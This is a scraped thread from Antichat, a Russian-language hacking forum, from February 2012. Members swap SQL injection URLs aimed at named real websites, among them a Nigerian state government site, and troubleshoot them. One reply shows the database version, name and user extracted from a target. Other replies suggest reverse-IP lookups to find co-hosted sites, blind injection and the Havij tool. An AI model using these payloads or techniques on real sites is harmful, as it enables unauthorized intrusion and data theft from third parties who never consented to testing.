 |
|
20.02.2012, 20:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от lightangel
Код:
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0)+--+
I tried most injections but do not work on it. http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/*!union+select*/+1,concat_ws(0x3a,version(),database(),user()),3,4 ,5,6,7,8,9,0+--+
5.1.56:jigawa_jigawa:jigawa@localhost
use google to translate this: КУРИ МАНУАЛЫ БЛЕАТЬ !11
|
|
|
21.02.2012, 00:56
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
как узнать сайты на серве, если хттпд конфиги не доступны?
|
|
|
|
21.02.2012, 01:23
|
|
Участник форума
Регистрация: 09.02.2011
Сообщений: 218
С нами:
8029046
Репутация:
9
|
|
Сообщение от faza02
как узнать сайты на серве, если хттпд конфиги не доступны?
reverse-ip\открываешь индексный файл, ищешь нем строку, уникальную на твой взгляд и гуглишь в кавычках
|
|
|
|
21.02.2012, 02:48
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
угу, да, еще можно заглянуть в скл базу, сайтов больше 20
нужны именно варианты с конфигами
|
|
|
|
21.02.2012, 05:07
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
Код:
http://www.oistbpl.com/groupinfo.php?show=-1+/*!union+select*/+1,2,3,4,5,6+--+
Why is this showing 500 Internal Server Error?
Haven't seen this before in SQL. |
|
|
|
21.02.2012, 11:33
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от lightangel
Код:
http://www.oistbpl.com/groupinfo.php?show=-1+/*!union+select*/+1,2,3,4,5,6+--+
Why is this showing 500 Internal Server Error?
Haven't seen this before in SQL. крути как слепую
|
|
|
|
22.02.2012, 00:44
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от kdiler
Как нибудь можно это дело развить?
может стоить попробывать программой, типа хавиджа
|
|
|
|
22.02.2012, 03:23
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от kdiler
Возникла проблема при попытке раскрутить инъекцию в PostgreSQL.
Имеется адрес вида: При подстановке существующего ID выдается контент, при неверном циферном просто пустая страница.
Подставил кавычку, выдало:
ERROR: invalid input syntax for integer: "`106".
Почитал маны, подставил запрос, скрипт ответил так: .
И что бы я не подставлял, мне приходил подобный ответ.
Как нибудь можно это дело развить?
Либо неправильный синтаксис (где-нить в скуле не хватает скобок и т.п.) или юзается bind / execute
|
|
|
|
22.02.2012, 09:46
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
kdiler, выкладывай ссылку.
|
|
|
|
22.02.2012, 22:40
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от None
http://www.1000turov.ru/maps.php?id=8+limit+0,0+union+select+user%28%29,us er%28%29--+
Подскажите, где на странице искать вывод?
и тут
Сообщение от None
http://www.mciti.ru/box.php?id=8+limit+0,0+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11+from+information_schema.tables--+
чего ошибку выдаёт вместо вывода?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
